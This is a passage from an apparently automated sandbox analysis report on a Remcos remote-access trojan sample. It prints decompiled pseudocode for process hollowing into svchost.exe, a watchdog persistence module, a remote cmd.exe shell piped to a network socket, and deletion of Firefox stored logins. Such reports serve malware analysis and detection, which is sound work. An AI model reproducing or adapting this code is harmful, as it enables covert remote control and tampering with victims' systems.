                      • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
                      • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051
                        • Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?), ref: 004061DE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                      • API String ID: 4189642951-1986272625
                      • Opcode ID: ab6d4a0e0f6d1058e14c64d1ee1328a7321297c8dc113bf4ca18e63fc18b8880
                      • Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
                      • Opcode Fuzzy Hash: ab6d4a0e0f6d1058e14c64d1ee1328a7321297c8dc113bf4ca18e63fc18b8880
                      • Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E0041412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                      				void _v8;
                      				signed int _v12;
                      				void* _v16;
                      				CONTEXT* _v20;
                      				WCHAR* _v24;
                      				struct _STARTUPINFOW _v92;
                      				void* __edi;
                      				void* _t58;
                      				void* _t72;
                      				void* _t73;
                      				int _t83;
                      				intOrPtr* _t95;
                      				void* _t98;
                      				signed int _t102;
                      				void* _t104;
                      				void* _t106;
                      				CONTEXT* _t110;
                      				void* _t113;
                      				CONTEXT* _t114;
                      				struct _PROCESS_INFORMATION* _t116;
                      
                      				_v8 = _v8 & 0x00000000;
                      				_v16 = __edx;
                      				_v24 = __ecx;
                      				if( *__edx == 0x5a4d) {
                      					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                      					if( *_t95 == 0x4550) {
                      						_push(_t106);
                      						L00431F00(_t106,  &_v92, 0, 0x44);
                      						_t116 = _a4;
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						asm("stosd");
                      						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                      							L21:
                      							_t58 = 0;
                      							L22:
                      							L23:
                      							return _t58;
                      						}
                      						CloseHandle(_v92.hStdInput);
                      						CloseHandle(_v92.hStdOutput);
                      						CloseHandle(_v92.hStdError);
                      						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                      						_v20 = _t110;
                      						_t110->ContextFlags = 0x10007;
                      						_t14 =  &(_t116->hThread); // 0xffffdcf2
                      						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                      							L20:
                      							TerminateProcess(_t116->hProcess, 0);
                      							CloseHandle(_t116->hProcess);
                      							_t50 =  &(_t116->hThread); // 0xffffdcf2
                      							CloseHandle( *_t50);
                      							asm("stosd");
                      							asm("stosd");
                      							asm("stosd");
                      							asm("stosd");
                      							goto L21;
                      						} else {
                      							_t72 = _v8;
                      							if(_t72 ==  *(_t95 + 0x34)) {
                      								NtUnmapViewOfSection(_t116->hProcess, _t72);
                      							}
                      							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                      							_v24 = _t73;
                      							if(_t73 == 0) {
                      								goto L20;
                      							} else {
                      								_t113 = _v16;
                      								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                      									goto L20;
                      								}
                      								_v12 = _v12 & 0x00000000;
                      								if(0 >=  *(_t95 + 6)) {
                      									L14:
                      									_t98 = _t95 + 0x34;
                      									_t114 = _v20;
                      									if(_v8 ==  *_t98) {
                      										L17:
                      										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                      										_t48 =  &(_t116->hThread); // 0xffffdcf2
                      										if(SetThreadContext( *_t48, _t114) == 0) {
                      											goto L20;
                      										}
                      										_t49 =  &(_t116->hThread); // 0xffffdcf2
                      										if(ResumeThread( *_t49) == 0xffffffff) {
                      											goto L20;
                      										}
                      										_t58 = 1;
                      										goto L22;
                      									}
                      									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                      									if(_t83 != 0) {
                      										goto L17;
                      									}
                      									TerminateProcess(_t116->hProcess, _t83);
                      									goto L21;
                      								}
                      								_t104 = 0;
                      								_v16 = 0;
                      								do {
                      									_t28 = _t113 + 0x3c; // 0x83ffc983
                      									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
                      									_t37 =  &_v16; // 0x41433b
                      									_t102 = _v12 + 1;
                      									_t104 =  *_t37 + 0x28;
                      									_v12 = _t102;
                      									_v16 = _t104;
                      								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                      								goto L14;
                      							}
                      						}
                      					}
                      					_t58 = 0;
                      					goto L23;
                      				}
                      				return 0;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ;CA
                      • API String ID: 0-233881251
                      • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                      • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                      • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                      • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E0040FAC7(void* __eflags) {
                      				char _v28;
                      				char _v36;
                      				void* _v40;
                      				char _v56;
                      				void* _v64;
                      				char _v76;
                      				char _v84;
                      				void* _v88;
                      				char _v100;
                      				char _v104;
                      				void* _v108;
                      				char _v124;
                      				char _v128;
                      				long _v132;
                      				char _v148;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				long _t26;
                      				void* _t29;
                      				void* _t35;
                      				void* _t46;
                      				void* _t61;
                      				void* _t78;
                      				void* _t107;
                      				long _t112;
                      				long _t141;
                      				void* _t142;
                      				CHAR* _t143;
                      				void* _t145;
                      				signed int _t147;
                      				void* _t149;
                      				void* _t155;
                      
                      				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                      				_push(_t142);
                      				_t26 = GetCurrentProcessId();
                      				if(L00410BB0(0x46c518, L00401F95(0x46c518), "WD", _t26) != 0) {
                      					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                      					__eflags = _t29;
                      					if(_t29 == 0) {
                      						E004020D5(0x46c518,  &_v100);
                      						E004179DC(L00401EEB(0x46c500),  &_v100);
                      						L00401F6D(0x46c518,  &_v124);
                      						__eflags = E00417614( &_v124);
                      						if(__eflags != 0) {
                      							_t35 = E0040427F(0x46c518,  &_v76, L"\\SysWOW64");
                      							L00401EFA( &_v132, _t37, _t142, E00403030( &_v36, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
                      							L00401EF0();
                      							L00401EF0();
                      						} else {
                      							_t61 = E0040427F(0x46c518,  &_v28, L"\\system32");
                      							L00401EFA( &_v132, _t63, _t142, E00403030( &_v84, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
                      							L00401EF0();
                      							L00401EF0();
                      						}
                      						L00401EF0();
                      						E0040766C(0x46c518,  &_v124, 0, L"\\svchost.exe");
                      						_t143 = L00401F95( &_v104);
                      						_t46 = E0041412B(L00401EEB( &_v128), _t143, 0x46bd50);
                      						_t150 = _t149 - 0x18;
                      						_t107 = _t149 - 0x18;
                      						__eflags = _t46;
                      						if(_t46 != 0) {
                      							E00402084(0x46c518, _t107, "Watchdog module activated");
                      							E00402084(0x46c518, _t150 - 0x18, "[Info]");
                      							L00416C80(0x46c518, 0);
                      							Sleep(0x7d0);
                      							_t112 =  *0x46bd58; // 0x0
                      							goto L13;
                      						}
                      						E00402084(0x46c518, _t107, "Watchdog launch failed!");
                      						E00402084(0x46c518, _t150 - 0x18, "[ERROR]");
                      						L00416C80(0x46c518, 0);
                      						CloseHandle( *0x46bd60);
                      						L00401EF0();
                      						L00401FC7();
                      						_push(3);
                      						_pop(1);
                      					} else {
                      						CloseHandle(_t29);
                      						_t155 = _t149 - 0x18;
                      						E00402084(0x46c518, _t155, "Remcos restarted by watchdog!");
                      						_t156 = _t155 - 0x18;
                      						E00402084(0x46c518, _t155 - 0x18, "[Info]");
                      						L00416C80(0x46c518, 0);
                      						E00402084(0x46c518, _t156 + 0x18, "Watchdog module activated");
                      						E00402084(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
                      						L00416C80(0x46c518, 0);
                      						CreateThread(0, 0, E004100F9, 0, 0, 0);
                      						_t143 = "WDH";
                      						_t78 = E00410885(L00401F95(0x46c518), _t143,  &_v148);
                      						__eflags = _t78;
                      						if(_t78 == 0) {
                      							goto L1;
                      						} else {
                      							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
                      							L00410CE2(L00401F95(0x46c518), __eflags, _t143);
                      							_t112 = _v132;
                      							L13:
                      							L14();
                      							asm("int3");
                      							_push(_t143);
                      							_push(0);
                      							_t141 = _t112;
                      							L15:
                      							_t145 = OpenProcess(0x100000, 0, _t141);
                      							WaitForSingleObject(_t145, 0xffffffff);
                      							CloseHandle(_t145);
                      							__eflags =  *0x46bd4e;
                      							if(__eflags != 0) {
                      								E0040FAC7(__eflags, 0);
                      							}
                      							goto L15;
                      						}
                      						L17:
                      					}
                      				} else {
                      					L1:
                      				}
                      				return 1;
                      				goto L17;
                      			}

                      APIs
                      • GetCurrentProcessId.KERNEL32 ref: 0040FAD3
                        • Part of subcall function 00410BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6BC), ref: 00410BBE
                        • Part of subcall function 00410BB0: RegSetValueExA.ADVAPI32(0045F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BD9
                        • Part of subcall function 00410BB0: RegCloseKey.ADVAPI32(0045F6BC,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BE4
                      • OpenMutexA.KERNEL32 ref: 0040FB0D
                      • CloseHandle.KERNEL32(00000000), ref: 0040FB1C
                      • CreateThread.KERNEL32 ref: 0040FB72
                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD3A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                      • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                      • API String ID: 3018269243-3797382479
                      • Opcode ID: 05e8c219c4dea432a12226232b0cf6631131a0ac3a866d2b262575c3da184e56
                      • Instruction ID: b085b79558e0c22ee18e78a7f4af536a5d5efbf70cd450b3fa531ddec726aa5e
                      • Opcode Fuzzy Hash: 05e8c219c4dea432a12226232b0cf6631131a0ac3a866d2b262575c3da184e56
                      • Instruction Fuzzy Hash: 545120316043015BC218BB72CC1B8AF37699E91749F50043FF946721E2EE789909C6AF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E004055EA(char _a4) {
                      				long _v8;
                      				long _v12;
                      				long _v16;
                      				char _v40;
                      				char _v64;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				long _t52;
                      				void* _t56;
                      				void* _t66;
                      				void* _t70;
                      				void* _t79;
                      				CHAR* _t80;
                      				int _t98;
                      				intOrPtr* _t107;
                      				intOrPtr _t138;
                      				signed int _t146;
                      				signed int _t147;
                      				long _t151;
                      				void* _t155;
                      				intOrPtr* _t156;
                      				void* _t163;
                      				void* _t168;
                      				void* _t175;
                      
                      				_t156 = _t155 - 0x3c;
                      				_push(_t146);
                      				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
                      				_t147 = _t146 | 0xffffffff;
                      				_t98 = 0;
                      				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
                      					E0042F114(0x46dce8);
                      					_t160 =  *0x46dce8 - _t147;
                      					if( *0x46dce8 == _t147) {
                      						E0040484E(0, 0x46dc60, 0);
                      						E0042F49E(_t160, E004527B3);
                      						 *_t156 = 0x46dce8;
                      						E0042F0D5(_t147);
                      					}
                      				}
                      				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
                      					E0042F114(0x46dcc8);
                      					_t162 =  *0x46dcc8 - _t147;
                      					if( *0x46dcc8 == _t147) {
                      						E004020D5(_t98, 0x46dcf0);
                      						E0042F49E(_t162, E004527A9);
                      						E0042F0D5(_t147, 0x46dcc8);
                      					}
                      				}
                      				_t100 =  &_v40;
                      				E004020D5(_t98,  &_v40);
                      				_t139 = 0x46c2d0;
                      				_v8 = _t98;
                      				_t163 =  *0x46bae2 - _t98; // 0x0
                      				if(_t163 != 0) {
                      					L12:
                      					_v12 = _t98;
                      					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
                      					if(_v12 <= _t98) {
                      						_t156 = _t156 - 0x18;
                      						E00402084(_t98, _t156, 0x45f6bc);
                      						_push(0x62);
                      						_t147 = L00404AA4(_t98, 0x46dc60, _t136, __eflags);
                      						goto L21;
                      					}
                      					_push(_v12);
                      					_t56 = E004394F6(_t100);
                      					_t140 = _t56;
                      					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
                      					if(_v16 <= _t98) {
                      						L19:
                      						L004394F1(_t140);
                      						_t139 = 0x46c2d0;
                      						goto L21;
                      					}
                      					if(_v8 <= _t98) {
                      						L17:
                      						E00402084(_t98,  &_v64, _t140);
                      						_t156 = _t156 - 0x18;
                      						_t107 = _t156;
                      						_push(_v16);
                      						_push(_t98);
                      						L18:
                      						E00405A14(_t98, _t107, _t136, _t172);
                      						_t147 = L00404AA4(_t98, 0x46dc60, _t136, _t172, 0x62,  &_v64);
                      						L00401FC7();
                      						goto L19;
                      					}
                      					_t66 = E00439510(_t140, L00401F95( &_v40), _v8);
                      					_t156 = _t156 + 0xc;
                      					_t172 = _t66;
                      					if(_t66 != 0) {
                      						goto L17;
                      					}
                      					E00402084(_t98,  &_v64, _t140);
                      					_t156 = _t156 - 0x18;
                      					_t107 = _t156;
                      					_push(_v16 - _v8);
                      					_push(_v8);
                      					goto L18;
                      				} else {
                      					_t136 = "cmd.exe";
                      					_t70 = E00405A6F("cmd.exe");
                      					_t164 = _t70;
                      					if(_t70 == 0) {
                      						L26:
                      						L00404E0B(0x46dc60);
                      						CloseHandle( *0x46dcd0);
                      						CloseHandle( *0x46dcec);
                      						 *0x46bae2 = _t98;
                      						_t98 = 1;
                      						L27:
                      						L00401FC7();
                      						L00401FC7();
                      						return _t98;
                      					}
                      					E00405A0B(_t98, 0x46dcf0, E0043988A(_t98, _t164, "SystemDrive"));
                      					E00405A02(_t98, 0x46dcf0, 0x46c2d0, "\\");
                      					0x46dc08->nLength = 0xc;
                      					 *0x46dc10 = 1;
                      					 *0x46dc0c = _t98;
                      					if(CreatePipe(0x46dce4, 0x46dccc, 0x46dc08, _t98) == 0 || CreatePipe(0x46dcd0, 0x46dcec, 0x46dc08, _t98) == 0) {
                      						goto L27;
                      					} else {
                      						_t151 = 0x44;
                      						L00431F00(0x46dc18, 0x46dc18, _t98, CreatePipe);
                      						0x46dc18->cb = _t151;
                      						 *0x46dc44 = 0x101;
                      						 *0x46dc48 = 0;
                      						 *0x46dc50 =  *0x46dce4;
                      						_t79 =  *0x46dcec;
                      						 *0x46dc54 = _t79;
                      						 *0x46dc58 = _t79;
                      						_t80 = L00401F95(0x46dcf0);
                      						 *0x46bae2 = CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
                      						E00405A0B(_t98, 0x46c2d0, 0x45f6bc);
                      						 *0x46bae3 = 1;
                      						E0040498B(0x46dc60);
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						E00404A08("cmd.exe");
                      						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
                      						E004020EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
                      						_push(0x93);
                      						_t100 = 0x46dc60;
                      						_t147 = L00404AA4(_t98, 0x46dc60, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
                      						Sleep(0x12c);
                      						_t168 =  *0x46bae2 - _t98; // 0x0
                      						if(_t168 == 0) {
                      							goto L26;
                      						}
                      						_t139 = 0x46c2d0;
                      						do {
                      							goto L12;
                      							L21:
                      							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                      							_t100 = _t139;
                      							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                      							if(E00402489() == 0) {
                      								_v8 = _t98;
                      							} else {
                      								E00405A02(_t98, _t139, _t139, "\n");
                      								L00401FAD( &_v40, _t139);
                      								_t52 = E00402489();
                      								WriteFile( *0x46dccc, L00401F95(_t139), _t52,  &_v8, _t98);
                      								_t100 = _t139;
                      								E00405A0B(_t98, _t139, 0x45f6bc);
                      							}
                      							Sleep(0x64);
                      							_t175 =  *0x46bae3 - _t98; // 0x0
                      						} while (_t175 != 0);
                      						TerminateProcess(0x46dcd4->hProcess, _t98);
                      						CloseHandle( *0x46dcd8);
                      						CloseHandle( *0x46dcd4);
                      						goto L26;
                      					}
                      				}
                      			}

                      0x004055f3
                      0x004055f7
                      0x004055f9
                      0x004055fb
                      0x00405603
                      0x0040560b
                      0x00405612
                      0x00405618
                      0x0040561e
                      0x00405626
                      0x00405630
                      0x00405635
                      0x0040563c
                      0x00405641
                      0x0040561e
                      0x0040564d
                      0x00405655
                      0x0040565b
                      0x00405661
                      0x00405668
                      0x00405672
                      0x00405679
                      0x0040567e
                      0x00405661
                      0x0040567f
                      0x00405682
                      0x00405687
                      0x0040568c
                      0x0040568f
                      0x00405695
                      0x0040580b
                      0x0040580f
                      0x0040581c
                      0x00405825
                      0x004058c7
                      0x004058d1
                      0x004058d6
                      0x004058e2
                      0x00000000
                      0x004058e2
                      0x0040582b
                      0x0040582e
                      0x00405835
                      0x00405845
                      0x0040584e
                      0x004058b9
                      0x004058ba
                      0x004058c0
                      0x00000000
                      0x004058c0
                      0x00405853
                      0x00405888
                      0x0040588c
                      0x00405891
                      0x00405894
                      0x00405896
                      0x00405899
                      0x0040589a
                      0x0040589e
                      0x004058b2
                      0x004058b4
                      0x00000000
                      0x004058b4
                      0x00405862
                      0x00405867
                      0x0040586a
                      0x0040586c
                      0x00000000
                      0x00000000
                      0x00405872
                      0x0040587d
                      0x00405880
                      0x00405882
                      0x00405883
                      0x00000000
                      0x0040569b
                      0x0040569b
                      0x004056a2
                      0x004056a7
                      0x004056a9
                      0x00405982
                      0x00405987
                      0x00405992
                      0x0040599e
                      0x004059a4
                      0x004059aa
                      0x004059ac
                      0x004059af
                      0x004059b7
                      0x004059c4
                      0x004059c4
                      0x004056c2
                      0x004056ce
                      0x004056ea
                      0x004056f4
                      0x004056fe
                      0x00405708
                      0x00000000
                      0x00405724
                      0x00405726
                      0x0040572f
                      0x00405737
                      0x0040573f
                      0x00405749
                      0x0040575e
                      0x00405763
                      0x00405769
                      0x0040576e
                      0x00405773
                      0x0040579c
                      0x004057a3
                      0x004057ad
                      0x004057b4
                      0x004057c3
                      0x004057c4
                      0x004057c5
                      0x004057c6
                      0x004057ce
                      0x004057d3
                      0x004057dc
                      0x004057e1
                      0x004057e6
                      0x004057f2
                      0x004057f4
                      0x004057fa
                      0x00405800
                      0x00000000
                      0x00000000
                      0x00405806
                      0x0040580b
                      0x00000000
                      0x004058e4
                      0x004058ef
                      0x004058f2
                      0x004058f4
                      0x00405900
                      0x00405946
                      0x00405902
                      0x00405909
                      0x00405912
                      0x0040591e
                      0x00405932
                      0x0040593d
                      0x0040593f
                      0x0040593f
                      0x0040594b
                      0x00405951
                      0x00405951
                      0x00405964
                      0x00405970
                      0x0040597c
                      0x00000000
                      0x0040597c
                      0x00405708

                      APIs
                      • __Init_thread_footer.LIBCMT ref: 0040563C
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • __Init_thread_footer.LIBCMT ref: 00405679
                      • CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
                      • CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
                      • CreateProcessA.KERNEL32 ref: 0040578D
                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845
                        • Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4
                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
                      • Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
                      • TerminateProcess.KERNEL32(00000000), ref: 00405964
                      • CloseHandle.KERNEL32 ref: 00405970
                      • CloseHandle.KERNEL32 ref: 0040597C
                      • CloseHandle.KERNEL32 ref: 00405992
                      • CloseHandle.KERNEL32 ref: 0040599E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                      • String ID: SystemDrive$cmd.exe
                      • API String ID: 2994406822-3633465311
                      • Opcode ID: 6209404a36c534692876af1b64d00be9eda98b98fe014b7b6bc142202bf80baf
                      • Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
                      • Opcode Fuzzy Hash: 6209404a36c534692876af1b64d00be9eda98b98fe014b7b6bc142202bf80baf
                      • Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0040A012(void* __ebx, void* __edi, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				struct _WIN32_FIND_DATAA _v468;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t45;
                      				signed int _t58;
                      				signed int _t59;
                      				signed int _t73;
                      				signed int _t75;
                      				char* _t108;
                      				signed int _t109;
                      				char* _t129;
                      				void* _t130;
                      				void* _t134;
                      				void* _t135;
                      				void* _t136;
                      				void* _t137;
                      
                      				_t142 = __eflags;
                      				_t134 = __edi;
                      				_t89 = __ebx;
                      				E004020D5(__ebx,  &_v100);
                      				E004020D5(__ebx,  &_v76);
                      				E004020D5(__ebx,  &_v28);
                      				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                      				L00401FD1( &_v28, _t46, _t135, E004075C2(_t89,  &_v52, E0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                      				L00401FC7();
                      				L00401FC7();
                      				_t128 =  &_v28;
                      				_t136 = FindFirstFileA(L00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
                      				L00401FC7();
                      				_t143 = _t136 - 0xffffffff;
                      				if(_t136 != 0xffffffff) {
                      					while(1) {
                      						L15:
                      						__eflags = FindNextFileA(_t136,  &_v468);
                      						if(__eflags == 0) {
                      							break;
                      						}
                      						__eflags = _v468.dwFileAttributes & 0x00000010;
                      						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                      							continue;
                      						}
                      						_t108 =  &(_v468.cFileName);
                      						__eflags =  *_t108 - 0x2e;
                      						if( *_t108 != 0x2e) {
                      							L5:
                      							_t129 =  &(_v468.cFileName);
                      							_t109 = 0;
                      							__eflags = 0;
                      							while(1) {
                      								_t58 =  *(_t129 + _t109) & 0x000000ff;
                      								_t130 = "..";
                      								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                      								_t128 =  &(_v468.cFileName);
                      								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                      									break;
                      								}
                      								_t109 = _t109 + 1;
                      								__eflags = _t109 - 3;
                      								if(_t109 != 3) {
                      									continue;
                      								}
                      								_t59 = 0;
                      								L10:
                      								__eflags = _t59;
                      								if(__eflags != 0) {
                      									L00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                      									L00401FC7();
                      									L00401FC7();
                      									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                      									L00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                      									L00401FC7();
                      									L00401FC7();
                      									_t73 = DeleteFileA(L00401F95( &_v100));
                      									__eflags = _t73;
                      									if(_t73 == 0) {
                      										GetLastError();
                      									}
                      									_t75 = DeleteFileA(L00401F95( &_v76));
                      									__eflags = _t75;
                      									if(_t75 == 0) {
                      										GetLastError();
                      									}
                      								}
                      								goto L15;
                      							}
                      							asm("sbb eax, eax");
                      							_t59 = _t58 | 0x00000001;
                      							__eflags = _t59;
                      							goto L10;
                      						}
                      						__eflags =  *(_t108 + 1) & 0x000000ff;
                      						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                      							continue;
                      						}
                      						goto L5;
                      					}
                      					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                      					E0040A6EF(_t89, _t128, __eflags);
                      					FindClose(_t136);
                      					goto L17;
                      				} else {
                      					FindClose(_t136);
                      					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                      					E0040A6EF(_t89,  &_v28, _t143);
                      					L17:
                      					L00401FC7();
                      					L00401FC7();
                      					L00401FC7();
                      					return 1;
                      				}
                      			}

                      0x0040a012
                      0x0040a012
                      0x0040a012
                      0x0040a01f
                      0x0040a027
                      0x0040a02f
                      0x0040a03c
                      0x0040a05c
                      0x0040a064
                      0x0040a06c
                      0x0040a07d
                      0x0040a09a
                      0x0040a09c
                      0x0040a0a1
                      0x0040a0a4
                      0x0040a1da
                      0x0040a1da
                      0x0040a1e8
                      0x0040a1ea
                      0x00000000
                      0x00000000
                      0x0040a0cd
                      0x0040a0d4
                      0x00000000
                      0x00000000
                      0x0040a0da
                      0x0040a0e0
                      0x0040a0e3
                      0x0040a0f1
                      0x0040a0f1
                      0x0040a0f7
                      0x0040a0f7
                      0x0040a0f9
                      0x0040a0f9
                      0x0040a0fd
                      0x0040a102
                      0x0040a105
                      0x0040a10b
                      0x00000000
                      0x00000000
                      0x0040a10d
                      0x0040a10e
                      0x0040a111
                      0x00000000
                      0x00000000
                      0x0040a113
                      0x0040a11c
                      0x0040a11c
                      0x0040a11e
                      0x0040a14e
                      0x0040a156
                      0x0040a161
                      0x0040a17e
                      0x0040a190
                      0x0040a19b
                      0x0040a1a3
                      0x0040a1b1
                      0x0040a1b7
                      0x0040a1b9
                      0x0040a1bb
                      0x0040a1bb
                      0x0040a1ca
                      0x0040a1d0
                      0x0040a1d2
                      0x0040a1d4
                      0x0040a1d4
                      0x0040a1d2
                      0x00000000
                      0x0040a11e
                      0x0040a117
                      0x0040a119
                      0x0040a119
                      0x00000000
                      0x0040a119
                      0x0040a0e9
                      0x0040a0eb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040a0eb
                      0x0040a1fa
                      0x0040a1ff
                      0x0040a208
                      0x00000000
                      0x0040a0aa
                      0x0040a0ab
                      0x0040a0bb
                      0x0040a0c0
                      0x0040a20e
                      0x0040a211
                      0x0040a219
                      0x0040a221
                      0x0040a22c
                      0x0040a22c

                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                      • FindClose.KERNEL32(00000000), ref: 0040A0AB
